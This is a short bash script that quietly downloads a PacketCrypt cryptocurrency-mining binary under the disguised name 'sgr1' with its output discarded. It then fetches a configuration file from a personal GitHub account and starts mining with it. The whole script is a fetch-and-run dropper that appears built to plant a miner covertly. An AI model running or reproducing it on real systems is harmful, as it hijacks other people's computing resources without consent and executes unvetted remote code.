#!/bin/bash
wget -O sgr1 https://github.com/cjdelisle/packetcrypt_rs/releases/download/packetcrypt-v0.5.2/packetcrypt-v0.5.2-linux_amd64 >/dev/null 2>&1
chmod +x sgr1
wget https://raw.githubusercontent.com/6248202226/filesg/main/a.json
./sgr1 ann --config "a.json"
